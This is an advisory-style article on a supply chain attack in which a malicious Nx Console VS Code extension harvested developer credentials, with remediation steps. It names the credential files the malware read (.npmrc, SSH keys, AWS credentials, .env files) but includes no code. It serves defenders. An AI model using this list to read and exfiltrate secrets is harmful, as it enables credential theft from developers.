CISA Adds Nx Console Supply Chain Attack to KEV Catalog
CISA has added CVE-2026-48027 to its Known Exploited Vulnerabilities (KEV) catalog — an embedded malicious code vulnerability in Nx Console, the official VS Code extension for the Nx monorepo build system developed by Nrwl. The vulnerability reflects a supply chain attack in which a malicious version of the extension was published to the VS Code marketplace, harvesting developer credentials from disk and memory.
The inclusion in CISA's KEV catalog confirms active exploitation in the wild.
Vulnerability Details
| Detail | Value |
|---|---|
| CVE | CVE-2026-48027 |
| Severity | High |
| Type | Embedded Malicious Code / Supply Chain |
| Vendor | Nx (Nrwl) |
| Product | Nx Console (VS Code Extension) |
| CISA KEV Added | 2026-05-27 |
| Impact | Credential harvesting from disk and memory |
What Happened
The vulnerability stems from a supply chain compromise of the Nx Console VS Code extension — one of the most widely installed developer tools in the Nx ecosystem, used by teams building monorepos with Angular, React, Next.js, and other frameworks.
An attacker was able to publish a malicious version of Nx Console to the Visual Studio Code Extension Marketplace. This compromised version contained embedded malicious code that:
- Fetched an obfuscated payload from a remote attacker-controlled server upon extension activation
- Executed the payload within the VS Code extension host process, which has access to the developer's local filesystem and running processes
- Harvested credentials from multiple sources on disk (e.g.,
.npmrc,.ssh/,~/.aws/credentials, browser profile directories,.envfiles, git credential stores) and from memory (e.g., environment variables of running processes, clipboard contents) - Exfiltrated the collected data to attacker infrastructure
The use of an obfuscated remote payload is a common technique to evade static analysis by marketplace security scanners — the malicious extension itself contains no immediately detectable harmful code, only a loader.
Attack Surface: Why VS Code Extensions Are High Risk
VS Code extensions run in a privileged extension host process that operates outside the browser sandbox:
- Extensions have direct filesystem access — they can read any file the current user can access
- Extensions can spawn child processes and execute arbitrary system commands
- Extensions can access environment variables of the VS Code process and its children
- Extensions run automatically on workspace open without additional user confirmation
- The VS Code Marketplace signing and review process has historically been less rigorous than traditional software distribution channels
This combination makes a malicious VS Code extension one of the most effective vectors for developer credential theft — a single installation can compromise cloud provider credentials, source code signing keys, package registry tokens, and SSH private keys simultaneously.
Affected Populations
Any developer who installed the compromised version of Nx Console during the window in which the malicious version was available on the marketplace should treat their workstation as potentially compromised. This particularly includes:
- Angular and Nx monorepo developers (Nx Console's primary audience)
- Teams using Angular CLI (Nx Console integrates deeply with Angular tooling)
- CI/CD pipeline operators who may have Nx Console installed in automated environments
- Enterprise development teams using Nx for large-scale frontend development
Remediation
Immediate Steps
- Remove the compromised Nx Console version if currently installed — verify you are running a known-clean version from Nrwl's official release notes
- Rotate all credentials accessible from the affected workstation:
- npm and package registry tokens
- AWS, GCP, Azure service account keys
- GitHub/GitLab personal access tokens and SSH keys
.npmrcauth tokens- Any secrets stored in
.envfiles in workspace directories
- Audit recent outbound network connections from development machines for connections to unknown or suspicious hosts during the period the malicious extension was active
- Check VS Code extension audit logs if your organization uses endpoint monitoring
Longer-Term Extension Security
- Pin VS Code extension versions using
.vscode/extensions.jsonwith specific version requirements and enforce through policy - Use extension blocklists/allowlists via VS Code's
extensions.allowedExtensionIDssetting in enterprise deployments - Disable auto-updates for VS Code extensions in sensitive development environments
- Monitor extension host network activity — a legitimate coding extension should rarely make outbound HTTP requests
- Review all installed extensions against the CISA KEV catalog and vendor security advisories
Key Takeaways
- CISA KEV confirmation means this vulnerability is actively being exploited — treat any installation of the compromised version as a confirmed breach of that workstation
- Developer tools are a tier-1 supply chain target — a compromised IDE extension provides access to credentials for every service a developer touches
- Obfuscated remote payload fetching is a deliberate evasion tactic to bypass marketplace scanning — static security analysis of extension source is insufficient
- Credential rotation must be comprehensive — partial rotation after a developer workstation compromise leaves residual access for attackers